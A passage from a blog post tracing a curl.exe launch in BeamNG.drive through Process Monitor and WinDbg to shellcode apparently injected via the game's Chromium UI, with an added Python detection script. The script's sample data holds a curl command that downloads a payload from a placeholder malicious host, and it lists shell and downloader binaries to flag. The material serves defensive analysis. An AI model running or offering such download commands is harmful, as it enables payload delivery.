WARNING: This post contains snippets of code from real malware. Do not run any of the code in this post outside of a secure, isolated virtual machine.

Last week, I fired up BeamNG.drive hoping to enjoy a ride around Belasco City. But just after I launched the game, I noticed an odd notification from my antivirus software. curl.exe? That can't be good. Cloudflare Radar confirmed that the domain curl tried to access is known to be malicious. At this point, however, I wasn't 100% sure this came from the game.

Starting the investigation

To find out whether the problem was indeed in the game, I re-launched it with Process Monitor running. Filtering through the events, my suspicion was confirmed: a process launching cmd with a curl command was spawned by the game. But where exactly was this command coming from? Was it a mod, or was the game itself compromised?

Inspecting the call stack in Process Monitor shows the command was executed by calling WinExec, a legacy function dating back to 16-bit Windows that is commonly used by shellcode. To take a closer look, I attached the WinDbg debugger to the game process and set a breakpoint on WinExec. When the malicious code tries to run the command, the debugger pauses the process and lets me inspect the call stack and memory. That breakpoint was hit at the exact moment I opened the in-game mod manager.

WinDbg shows the address from which WinExec was called, and we can use that to find the shellcode that executed the command. But how did this shellcode get there in the first place? Unfortunately, the call stack doesn't show us which file it came from, but it does contain another clue: libcef. This refers to the Chromium Embedded Framework, which suggests a vulnerability in Chromium might have been exploited to insert the shellcode into memory. BeamNG.drive uses Chromium to render parts of the UI, including the mod manager where the malicious code was executed. I disabled all my downloaded mods and dug deeper.
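The Process Monitor finding above (the game process launching cmd.exe, which runs curl against a malicious domain) can be turned into a small detection check. The following is an added example, not code from the original post: it walks a constructed, simplified table of Process Monitor-style "Process Create" records, reports any shell or downloader whose ancestry leads back to the game process, and extracts the contacted host for a reputation lookup. The game executable name BeamNG.drive.x64.exe, the column layout and the URL are assumptions.

```python
# Added example, not code from the original post: flag shell/downloader
# launches whose process ancestry leads back to the game process.
import csv
import io
import re
from urllib.parse import urlparse

# Constructed, simplified Process Monitor-style "Process Create" records (the
# real CSV export has other columns). Game image name and URL are placeholders.
SAMPLE_EVENTS = """\
time,ppid,pid,image,cmdline
12:00:01,4000,4100,BeamNG.drive.x64.exe,BeamNG.drive.x64.exe
12:00:02,4100,4200,libcef_helper.exe,libcef_helper.exe --type=renderer
12:00:09,4100,4300,cmd.exe,cmd.exe /c curl -s http://malicious.example/p.bin -o C:\\Temp\\p.bin
12:00:09,4300,4301,curl.exe,curl -s http://malicious.example/p.bin -o C:\\Temp\\p.bin
"""

# Binaries a game's UI has no business launching: shells and downloaders.
LOLBINS = {"cmd.exe", "powershell.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}
URL_RE = re.compile(r"https?://\S+")

def load_events(text):
    return list(csv.DictReader(io.StringIO(text)))

def ancestry(events, pid):
    """Image names from the earliest known ancestor down to pid."""
    by_pid = {int(e["pid"]): e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["image"])
        pid = int(by_pid[pid]["ppid"])
    return chain[::-1]

def find_suspicious_spawns(events, game_image):
    """Return (chain, contacted_host) for each LOLBin descended from the game."""
    hits = []
    for e in events:
        if e["image"].lower() not in LOLBINS:
            continue
        chain = ancestry(events, int(e["pid"]))
        if game_image not in chain:
            continue  # a shell spawned by something else is out of scope here
        m = URL_RE.search(e["cmdline"])
        host = urlparse(m.group(0)).hostname if m else None
        hits.append((" -> ".join(chain), host))
    return hits

if __name__ == "__main__":
    for chain, host in find_suspicious_spawns(load_events(SAMPLE_EVENTS), "BeamNG.drive.x64.exe"):
        print(f"{chain}  host={host}")  # host is what you would check in Cloudflare Radar
```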
The mod I had a fe...